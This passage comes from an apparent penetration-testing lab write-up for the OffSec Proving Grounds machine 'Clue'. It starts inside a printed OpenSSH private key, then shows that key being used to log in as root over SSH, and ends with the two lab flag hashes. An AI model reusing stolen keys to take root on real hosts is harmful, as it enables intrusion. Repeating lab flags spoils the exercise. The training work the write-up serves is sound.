QIwreEaH8MF1+HUWtAAK1Lig53N0yNbIHTQ/Uk90QziiPDM+7QJx265XSRUkOd22wOoBws
mv4uzzNijfvrMLIm4IIGic9WK2vaYHopYgu/9qMrBuCs0xmlBvymscveVEhVpuNpK/RshP
HUox7JrJr4r4PPzhW7y4c0Uk7SuGqAEAa1SAEk0lZr0Rm3DCz0+2wsg7PJlitBM5Orj6r8
UWkAp9uw12pR7jjkWS8+avLLHsh/8NoyhJhI+HAAAAAwEAAQAAAQBjswJsY1il9I7zFW9Y    
etSN7wVok1dCMVXgOHD7iHYfmXSYyeFhNyuAGUz7fYF1Qj5enqJ5zAMnataigEOR3QNg6M  
mGiOCjceY+bWE8/UYMEuHR/VEcNAgY8X0VYxqcCM5NC201KuFdReM0SeT6FGVJVRTyTo+i
CbX5ycWy36u109ncxnDrxJvvb7xROxQ/dCrusF2uVuejUtI4uX1eeqZy3Rb3GPVI4Ttq0+ 
0hu6jNH4YCYU3SGdwTDz/UJIh9/10OJYsuKcDPBlYwT7mw2QmES3IACPpW8KZAigSLM4fG
Y2Ej3uwX8g6pku6P6ecgwmE2jYPP4c/TMU7TLuSAT9TpAAAAgG46HP7WIX+Hjdjuxa2/2C   
gX/VSpkzFcdARj51oG4bgXW33pkoXWHvt/iIz8ahHqZB4dniCjHVzjm2hiXwbUvvnKMrCG
krIAfZcUP7Ng/pb1wmqz14lNwuhj9WUhoVJFgYk14knZhC2v2dPdZ8BZ3dqBnfQl0IfR9b
yyQzy+CLBRAAAAgQD7g2V+1vlb8MEyIhQJsSxPGA8Ge05HJDKmaiwC2o+L3Er1dlktm/Ys
kBW5hWiVwWoeCUAmUcNgFHMFs5nIZnWBwUhgukrdGu3xXpipp9uyeYuuE0/jGob5SFHXvU
DEaXqE8Q9K14vb9by1RZaxWEMK6byndDNswtz9AeEwnCG0OwAAAIEAxxy/IMPfT3PUoknN
Q2N8D2WlFEYh0avw/VlqUiGTJE8K6lbzu6M0nxv+OI0i1BVR1zrd28BYphDOsAy6kZNBTU
iw4liAQFFhimnpld+7/8EBW1Oti8ZH5Mx8RdsxYtzBlC2uDyblKrG030Nk0EHNpcG6kRVj
4oGMJpv1aeQnWSUAAAAMYW50aG9ueUBjbHVlAQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ chmod 600 id_rsa

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ ssh root@clue.pg -i id_rsa
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Linux clue 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Nov  9 13:48:17 2025 from 192.168.45.187
root@clue:~#

Get the flags:

root@clue:~# cat proof_youtriedharder.txt
87a508096775a773136abfc29f3608a8
root@clue:~# find / -name local.txt -exec cat {} \;
c20f25c19ac3b83861c2457cdc569449